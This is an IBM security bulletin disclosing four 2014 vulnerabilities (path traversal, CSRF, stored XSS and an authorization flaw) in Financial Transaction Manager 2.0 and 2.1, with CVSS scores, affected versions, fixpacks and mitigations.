IBM Support

Security Bulletin: IBM Financial Transaction Manager 2.0 and 2.1 OAC vulnerabilities (CVE-2014-0830, CVE-2014-0831, CVE-2014-0832 , CVE-2014-0833)

Security Bulletin


Summary

IBM Financial Transaction Manager 2.0 and 2.1 OAC vulnerabilities

Vulnerability Details

CVE ID: CVE-2014-0830

SUMMARY: FTM 2.0 and 2.1 Table export function exposes a path traversal vulnerability

DESCRIPTION:
Search results in the FTM console can be exported as CSV format text files. As part of this function the server side code provides access to temporary files on the WAS server. It is possible for a rogue user, once logged in, to use client side tools to alter the file name to be read. Alteration can also include path traversal outside of the temporary file location. This potentially allows download of unauthorized files from the file system hosting the application server.
This exposure is limited to authenticated users.

CVSS Base Score: 4
CVSS Temporal Score: See
https://exchange.xforce.ibmcloud.com/vulnerabilities/90584 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:L/Au:S/C:P/I:N/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0 & 2.1

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1
FTM 2.1 customers may apply PTF/fixpack 2.1.0.1 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATIONS(s)
Ensure the application server user account does not have privileges to read files outside of its directories.


CVE ID: CVE-2014-0831

SUMMARY: FTM 2.0 OAC is not protected from cross site request forgery vulnerabilities.

DESCRIPTION:
A hand crafted link could be used to trick a user to initiate a function of the FTM OAC. If the user is authorized the request could cause edit of configuration data. The user must be logged in. Detailed knowledge of FTM http request format is required to exploit. Also in the case of any request to edit configuration data the request would need knowledge of the data being edited. In the case of edit, the request would be audited and the edit history would be recorded.

CVSS Base Score: 3.5
CVSS Temporal Score: See
https://exchange.xforce.ibmcloud.com/vulnerabilities/90585 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATIONS(s)
None


CVE ID: CVE-2014-0832

SUMMARY: FTM 2.0 Configuration details screens are exposed to cross site scripting vulnerabilities.

DESCRIPTION:
It is possible to create and edit configuration data that includes javascript in the text values. A subsequent user viewing these records would inadvertently execute the javascript in their browser.
This exposure is limited to authenticated users.
The creation and/or edit of the data to contain potentially malicious javascript if fully audited and traceable back to the user.

CVSS Base Score: 3.5
CVSS Temporal Score: See
https://exchange.xforce.ibmcloud.com/vulnerabilities/90586 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATIONS(s)
Restrict access to these screens to the minimum group of personnel to minimize risk.


CVE ID: CVE-2014-0833

SUMMARY: FTM 2.0 OAC could accept a request to execute a resolution action where the user is not authorized.

DESCRIPTION:
It is possible for an authenticated user to initiate unauthorized process steps for data that is in a state that supports operator intervention. The impact of this depends on the customer process model and the action requested.

CVSS Base Score: 3.5
CVSS Temporal Score: See
https://exchange.xforce.ibmcloud.com/vulnerabilities/90612 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)



AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATIONS(s)
Use of IE8 or Firefox instead of IE6 or IE7 will prevent accidental exposure but does not prevent deliberate exploitation.

RELATED INFORMATION:

https://www-304.ibm.com/jct03001c/security/secure-engineering/process.html

ACKNOWLEDGEMENT:

None

Affected Products and Versions

Financial Transaction manager v2.0 and v2.1

Remediation/Fixes

CVE ID

ProductVRMFAPARRemediation
CVE-2014-0830FTMv2.0.0.0
V2.0.0.1
v2.0.0.2
None.Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0830FTMV2.1.0.0None.Upgrade to v2.1.0.1 or v2.1.1
CVE-2014-0831FTMv2.0.0.0
V2.0.0.1
v2.0.0.2
None.Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0832FTMv2.0.0.0
V2.0.0.1
v2.0.0.2
None.Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0833FTMv2.0.0.0
V2.0.0.1
v2.0.0.2
None.Upgrade to v2.0.0.3 or v2.1.1

Get Notified about Future Security Bulletins

Important Note

IBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the System z Security web site. Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.

References

Off

Change History

24th January 2014: Original copy published

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

[{"Product":{"code":"SSPKQ5","label":"IBM Financial Transaction Manager"},"Business Unit":{"code":"BU059","label":"IBM Software w\/o TPS"},"Component":"Not Applicable","Platform":[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF035","label":"z\/OS"}],"Version":"2.1;2.0","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}]

Document Information

Modified date:
16 June 2018

UID

swg21662714